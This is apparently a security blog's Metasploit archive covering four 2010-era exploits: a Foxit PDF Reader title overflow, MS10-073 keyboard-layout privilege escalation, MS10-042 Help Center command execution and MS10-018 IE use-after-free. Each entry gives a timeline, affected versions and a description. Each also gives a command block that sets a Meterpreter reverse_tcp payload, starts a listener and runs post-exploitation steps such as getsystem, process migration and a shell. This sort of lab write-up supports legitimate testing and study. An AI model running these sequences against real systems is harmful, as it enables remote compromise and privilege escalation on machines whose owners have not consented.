Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

EDB-ID-15532 : Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow

Exploits, Metasploit,

Timeline :

Vulnerability reported to vendor by offsec before the public release on Exploit-DB
Vendor released new version the 2010-09-29
dookie & Sud0 exploit release on Exploit-DB the 2010-11-13
Metasploit exploit released the 2010-11-22

PoC provided by :

dookie
Sud0
corelanc0d3r
jduck

Reference(s) :

EDB-ID-15532

Affected version(s) :

Foxit PDF Reader prior to version 4.2.0.0928

Tested on Windows 7 Integral with :

Foxit PDF Reader 4.1.1.0805

Description :

This module exploits a stack buffer overflow in Foxit PDF Reader prior to version 4.2.0.0928. The vulnerability is triggered when opening a malformed PDF file that contains an overly long string in the Title field. This results in overwriting a structured exception handler record. NOTE: This exploit does not use javascript.

Commands :

use exploit/windows/fileformat/foxit_title_b­of
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sysinfo
getuid

MS10-073 : Microsoft Windows Keyboard Layout Privilege Escalation

Metasploit, ,

Timeline :

Vulnerability disclosed by Microsoft the 2010-10-12
Microsoft patch “KB981957” provided the 2010-10-12
Exploit-DB PoC provided by Ruben Santamarta the 2011-01-13
Metasploit PoC provided by jduck the 2011-01-17

PoC provided by :

Ruben Santamarta
jduck

Reference(s) :

CVE-2010-2743
MS10-073

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP2
Windows Server 2003 x64 Edition SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 Edition SP1 and Windows Vista x64 Edition SP2
Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit SP2
Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based SP2
Windows 7 for 32-bit Systems
Windows 7 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems

Tested on Windows XP SP3

Description :

This module exploits the keyboard layout 0day exploited by Stuxnet. When processing specially crafted keyboard layout files (DLLs), the Windows kernel fails to validate that an array index is within the bounds of the array. By loading a specially crafted keyboard layout, an attacker can execute code in Ring 0.

Commands :

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
ifconfig
set LHOST 192.168.178.21
exploit -j

sessions
sessions -i 1
getuid
getsystem
ps
migrate xxxx
background

use post/windows/escalate/ms10_073_kbdlayout
info
show options
set SESSION 1
exploit

sessions -i 1
getuid
getsystem
shell

MS10-042 : Microsoft Windows Help Center XSS and Command Execution

Exploits, Metasploit,

Timeline :

Vulnerability & PoC disclosed by Tavis Ormandy the 2010-06-10
Metasploit PoC provided by natron the 2010-06-10
Microsoft patch “KB2229593” provided the 2010-07-13

PoC provided by :

Tavis Ormandy
natron

Reference(s) :

CVE-2010-1885
MS10-042

Affected version(s) :

Internet Explorer 6
Internet Explorer 7
Internet Explorer 8

Tested on Windows XP SP3 with :

Internet Explorer 8

Description :

Help and Support Center is the default application provided to access online documentation for Microsoft Windows. Microsoft supports accessing help documents directly via URLs by installing a protocol handler for the scheme “hcp”. Due to an error in validation of input to hcp:// combined with a local cross site scripting vulnerability and a specialized mechanism to launch the XSS trigger, arbitrary command execution can be achieved. On IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it can be used to launch the exploit automatically. If IE8 and WMP11, either can be used to launch the attack, but both pop dialog boxes asking the user if execution should continue. This exploit detects if non-intrusive mechanisms are available and will use one if possible. In the case of both IE8 and WMP11, the exploit defaults to using an iframe on IE8, but is configurable by setting the DIALOGMECH option to “none” or “player”.

Commands :

use windows/browser/ms10_042_helpctr_xss_cmd­_exec
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS10-018 : Microsoft Internet Explorer DHTML Behaviors Use After Free

Exploits, Metasploit,

Timeline :

Microsoft MSA981374 advisory release the 2010-03-09
Exploit-DB PoC provided by Trancer the 2010-03-10
Metasploit PoC provided by duck the 2010-03-10
Microsoft patch “KB980182” provided the 2010-03-30

PoC provided by :

unknown
Trancer
Nanika
jduck

Reference(s) :

CVE-2010-0806
MS10-018

Affected version(s) :

Internet Explorer 6
Internet Explorer 7

Tested on Windows XP SP3 with :

Internet Explorer 6 before KB980182

Description :

This module exploits a use-after-free vulnerability within the DHTML behaviors functionality of Microsoft Internet Explorer versions 6 and 7. This bug was discovered being used in-the-wild and was previously known as the “iepeers” vulnerability. The name comes from Microsoft’s suggested workaround to block access to the iepeers.dll file. According to Nico Waisman, “The bug itself is when trying to persist an object using the setAttribute, which end up calling VariantChangeTypeEx with both the source and the destination being the same variant. So if you send as a variant an IDISPATCH the algorithm will try to do a VariantClear of the destination before using it. This will end up on a call to PlainRelease which deref the reference and clean the object.” NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected

Commands :

use windows/browser/ms10_018_ie_behaviors
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig